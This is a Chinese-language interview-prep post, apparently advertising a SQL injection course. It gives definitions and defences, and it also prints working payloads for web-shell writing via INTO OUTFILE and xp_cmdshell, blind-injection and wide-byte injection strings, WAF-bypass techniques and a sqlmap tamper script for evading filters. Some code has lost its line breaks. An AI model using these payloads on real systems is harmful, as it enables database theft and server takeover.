在前两期的面试经验分享中，我们收到了小伙伴们的热烈反馈，大家对面试话题征集活动展现出了浓厚的兴趣，纷纷表示希望能够了解更多关于面试的技巧和经验。

《SQL注入从0到1》是一套完整的漏洞解析课程，本课程全面剖析SQL注入原理、利用技巧、防御措施与绕过方法，专为新手打造，助力小白轻松掌握SQL注入漏洞

在过往的工作历程中，我既作为求职者深入体验过面试的紧张与挑战，也作为面试官见证过众多优秀人才的竞争。今天，很荣幸在这里给大家做一期关于SQL注入的面试分享，希望对小伙伴们有所帮助。

Q：简述数据库的存储引擎

A：数据库存储引擎是数据库底层软件组织，数据库管理系统（DBMS）使用数据引擎进行创建、查询、更新和删除数据。不同的存储引擎提供不同的存储机制、索引技巧、锁定水平等功能，使用不同的存储引擎，还可以获得特定的功能。

InnoDB：主流的存储引擎，mysql默认存储引擎

MyISAM：查询、插入速度快，不支持事务

MEMORY：hash索引、BTREE索引

Q：SQL注入有哪几种注入类型？

A：从注入参数类型分：数字型注入、字符型注入、搜索型注入；

从注入方法分：基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入；

从提交方式分：GET注入、POST注入、COOKIE注入、HTTP头注入。

Q：SQL注入的危害及防御？

A：【危害】数据库泄露、数据库被破坏、网站崩溃、服务器被植入木马；

【防御】代码层面对查询参数进行转义、预编译与参数绑定、利用WAF防御。

Q：Mysql一个@和两个@什么区别？

A：一个@是用户自定义变量，两个@是系统变量，如@@version、@@user。

Q：UDF提权原理？

A：Mysql支持用户自定义函数，将含有自定义函数的dll放入特定的文件夹，声明引入dll中的执行函数，使用执行函数执行系统命令。

Q：SQL与NoSQL的区别？

A：【SQL】关系型数据库，【NoSQL】非关系型数据库。

存储方式：SQL具有特定的结构表，NoSQL存储方式灵活；

性能：NoSQL较优于SQL；

数据类型：SQL适用结构化数据，如账号密码，NoSQL适用非结构化数据，如文章、评论。

Q：SQL注入写shell的条件，用法

A：【条件】

当前用户具有dba权限

找到网站绝对路径

网站有可写目录

mysql的配置secure_file_priv为空

【用法】

mysql：

id=1' and 1=2 union select 1,2,'shell内容' into outfile "绝对路径\shell.php" %23

sqlserver：

id=1';EXEC master..xp_cmdshell 'echo "shell内容" > 绝对路径\shell.asp' --

Q：SQL注入过滤了逗号，怎么办?

A：join绕过

union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);

Q：sleep被禁用后还能怎么进行sql注入？

A：benchmark代替sleep:

id=1 and if(ascii(substring((database()),1,1))=115,(select benchmark(10000000,md5(0x41))),1) --+

笛卡尔积盲注：

select * from ctf_test where user='1' and 1=1 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C)

RLIKE盲注：

select * from flag where flag='1' and if(mid(user(),1,1)='r',concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+cd',1)

Q：什么是宽字节注入？如何操作？

A：【宽字节注入】当php开启gpc或者使用addslashes函数时，单引号'被加上反斜杠\'，其中\的URL编码为%5C，我们传入%df'，等价于%df%5C'，此时若程序的默认字符集是GBK，mysql用GBK编码时会认为%df%5C是一个宽字符縗，于是%df%5C'便等价于縗'，产生注入。

操作：

id=1%df' and 1=2 union select 1,2,user(),4 %23

Q：SQL注入常见的过WAF方法？

A：内联注释绕过；

填充大量脏数据绕过；

垃圾参数填充绕过；

改变提交方式绕过，如GET方式变为POST方式提交；

随机agent头绕过；

fuzz过滤函数，函数替换绕过。

Q：sqlmap如何编写tamper？

A：tamper固定模板如下：

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW def dependencies(): passdef tamper(payload, **kwargs): pass

PROIORITY

用于定义tamper优先级，当调用多个tamper时生效，优先级如下，数值越大优先级越高：

• LOWEST = -100
• LOWER = -50
• LOW = -10
• NORMAL = 0
• HIGH = 10
• HIGHER = 50
• HIGHEST = 100

dependencies

用于提示用户tamper适用范围，具体代码如下：

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os__priority__ = PRIORITY.LOWdef dependencies():singleTimeWarnMessage("过狗tamper '%s' 只针对 %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

DBMS.MYSQL代表MYSQL，其他数据库类推。

Tamper

tamper关键函数，用于定义过滤规则，示例代码如下：

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWdef tamper(payload, **kwargs):payload=payload.replace('AND','/*!29440AND*/')payload=payload.replace('ORDER','/*!29440order*/')payload=payload.replace('LIKE USER()','like (user/**/())')payload=payload.replace('DATABASE()','database/*!29440*/()')payload=payload.replace('CURRENT_USER()','CURRENT_USER/**/()')payload=payload.replace('SESSION_USER()','SESSION_USER(%0a)')payload=payload.replace('UNION ALL SELECT','union/*!29440select*/')payload=payload.replace('super_priv','/*!29440/**/super_priv*/')payload=payload.replace('and host=','/*!29440and*/host/*!11440=*/')payload=payload.replace('BENCHMARK(','BENCHMARK/*!29440*/(')payload=payload.replace('SLEEP(','sleep/**/(')return payload

fuzz出具体payload后对关键字符进行替换。

Q：MSSQL差异备份原理及条件？

A：【原理】完整备份后，再次对数据库进行修改，差异备份会记录最后的LSN，将shell写入数据库，备份成asp即可getshell。

【条件】

MSSQL具有dbo或sa权限

支持堆叠查询

找到网站的绝对路径

Q：MYSQL注入/绕过常用的函数？

A：注入常用函数

database() 返回当前数据库名

user() 返回当前数据库用户名

updatexml() 更新xml文档，常用于报错注入

mid() 从指定字段中提取出字段的内容

limit() 返回结果中的前几条数据或者中间的数据

concat() 返回参数产生的字符串

group_concat() 分组拼接函数

count() 返回指定参数的数目

rand() 参数0~1个随机数

flood() 向下取整

substr() 截取字符串

ascii() 返回字符串的ascii码

left() 返回字符串最左边指定个数的字符

ord() 返回字符的ascii码

length() 返回字符串长度

sleep() 延时函数

等价函数绕过，反之亦可：

group_concat() ==> concat_ws()

sleep() ==> benchmark()

mid()、substr() ==> substring()

user() ==> @@user

updatexml() ==> extractvalue()

以上是我总结的关于SQL注入高频出现的面试题，若你对于其中的2道或更多题目感到困惑或回答错误，这可能表明你的基础知识尚需加强。为了更好地掌握SQL注入的核心内容，建议你观看完整视频教程，由浅入深系统学习，确保每个知识点都能熟练掌握。